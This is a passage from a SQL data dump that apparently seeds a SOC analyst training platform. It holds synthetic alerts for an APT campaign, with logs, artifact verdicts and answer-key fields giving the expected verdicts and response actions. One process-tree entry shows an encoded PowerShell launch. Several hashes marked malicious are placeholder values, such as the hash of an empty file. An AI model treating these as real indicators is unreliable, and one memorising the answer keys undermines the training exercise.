1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:34Z\\\",\\\"device_id\\\":\\\"android-1234567890\\\",\\\"user\\\":\\\"jdoe@example.com\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"filename\\\":\\\"malicious_app.apk\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"device_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"app_installation\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1156, 'Backdoor Installation Detected', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The EDR system detected an advanced backdoor installation attempt, indicating an attempt by attackers to maintain persistent access to the device. The backdoor is capable of surviving system reboots and updates.', 'Persistence', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR-2354\",\"hostname\":\"compromised-host.local\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.23.198.45\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"process_id\":4820,\"command_line\":\"svchost.exe -k netsvcs\",\"associated_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"detected_by\":\"Advanced Threat Protection Module\"}', '2026-02-07 21:13:37', '2026-02-23 19:51:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.23.198.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known backdoor variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable located in a critical system 
directory.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Valid user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1157, 'Lateral Movement via Infected Applications', 'high', 'Network Traffic Analysis', 'An advanced threat actor is leveraging compromised applications to facilitate lateral movement within the network. The actor uses a backdoor to deploy these applications, expanding their access to additional internal devices.', 'Lateral Movement', 'T1210: Exploitation of Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"event_type\":\"connection_attempt\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"filename\":\"compromised_app_v2.exe\",\"protocol\":\"SMB\",\"action\":\"allowed\"}', '2026-02-07 21:13:37', '2026-02-23 19:56:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal asset within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"compromised_app_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File detected as part of lateral movement attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account within the 
organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1158, 'Data Exfiltration to Remote Server', 'critical', 'Firewall and Proxy Logs', 'The operation culminates with the exfiltration of sensitive data, including government communications and military plans, to an external server controlled by the adversaries.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:35:21Z\",\"internal_ip\":\"10.0.15.7\",\"external_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_hash\":\"7d793037a0760186574b0282f2f435e7\",\"file_name\":\"confidential_plans.zip\",\"action\":\"allowed\",\"bytes_sent\":2547893,\"proxy_status\":\"successful\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/upload\"}', '2026-02-07 21:13:37', '2026-02-16 05:01:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7d793037a0760186574b0282f2f435e7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_plans.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive content being exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1159, 'Suspicious Email with Malicious InPage Attachment', 'high', 'Email Gateway Logs', 'Bitter APT initiates the attack by sending phishing emails with malicious InPage documents to government employees. The email contains an attachment titled \'Official_Document.inp\' which is suspected to be malicious.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T10:15:30Z\",\"email_id\":\"msg123456789\",\"sender\":\"bitter.apt@example.com\",\"recipient\":\"john.doe@government.gov\",\"subject\":\"Urgent: Official Document\",\"attachment\":{\"filename\":\"Official_Document.inp\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"size\":102400},\"network\":{\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"192.168.1.100\"},\"email_headers\":{\"from\":\"bitter.apt@example.com\",\"to\":\"john.doe@government.gov\",\"subject\":\"Urgent: Official Document\",\"message_id\":\"<1234567890@example.com>\"}}', '2026-02-07 21:14:20', '2026-02-23 17:44:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"bitter.apt@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known APT group email address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"InPage malware associated with Bitter APT\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Bitter APT command and control server\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Official_Document.inp\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file type for email 
attachment\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious InPage Attachment\",\"date\":\"2026-02-08T19:00:00.296Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1160, 'Execution of Exploited InPage Document', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious InPage document was opened, triggering its embedded exploit to execute code, resulting in system compromise. This action was detected on an endpoint, indicating the exploitation of an InPage vulnerability.', 'Code Execution', 'T1203: Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"EDR-20231010-000567\",\"hostname\":\"compromised-host-01\",\"username\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.42\",\"file_name\":\"invoice_2023.inp\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"process_name\":\"inpage.exe\",\"command_line\":\"\\\"C:\\\\Program Files\\\\InPage\\\\inpage.exe\\\" \\\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\invoice_2023.inp\\\"\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.42\"},{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\"},{\"type\":\"filename\",\"value\":\"invoice_2023.inp\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-02-07 21:14:20', '2026-02-23 17:45:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious InPage document exploit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.inp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious 
documents.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Active directory user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1161, 'ArtraDownloader Malware Installation', 'high', 'Host-based Intrusion Detection System (HIDS)', 'ArtraDownloader has been installed on the compromised system to establish persistence and facilitate further attacks.', 'Malware Installation', 'T1546', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:10Z\",\"event_id\":\"4624\",\"message\":\"Installation of ArtraDownloader detected.\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.1.15\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"artradownloader.exe\",\"user\":\"compromised_user\",\"process_id\":\"1234\",\"context\":\"Persistence mechanism added via registry modification.\"}', '2026-02-07 21:14:20', '2026-02-23 19:34:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP known for distributing malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ArtraDownloader malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"artradownloader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Filename linked to ArtraDownloader.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account showing anomalous 
behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:00.298Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"message\\\":\\\"Installation of ArtraDownloader detected.\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"artradownloader.exe\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"process_id\\\":\\\"1234\\\",\\\"context\\\":\\\"Persistence mechanism added via registry modification.\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1162, 'Lateral Movement via Compromised Credentials', 'high', 'Network Traffic Analysis', 'Bitter APT used compromised credentials to access a critical server in the internal network, attempting lateral movement with potential data exfiltration.', 'Credential Access', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:22:57Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"username\":\"j.doe\",\"event\":\"Successful login attempt\",\"protocol\":\"RDP\",\"file_name\":\"bitter_agent.dll\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"status\":\"Accepted\",\"log_id\":\"evt-20231010142257\"}', '2026-02-07 21:14:20', '2026-02-23 19:37:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Bitter APT infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical internal server targeted\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee credentials used\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"bitter_agent.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Associated with Bitter APT operations\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash related to Bitter 
APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1163, 'Data Exfiltration of Sensitive Government Documents', 'critical', 'Data Loss Prevention (DLP) Systems', 'The operation culminated with the exfiltration of sensitive documents from the government network. The attacker used a compromised user account to transfer the files to an external server, marking the completion of the intelligence-gathering mission.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:27Z\",\"event_id\":\"DLP-EXFIL-2023\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"action\":\"file_transfer\",\"transferred_files\":[{\"filename\":\"classified_documents.zip\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"size\":\"150MB\"}],\"protocol\":\"HTTPS\",\"status\":\"success\"}', '2026-02-07 21:14:20', '2026-02-16 04:59:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actor APT32\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, 
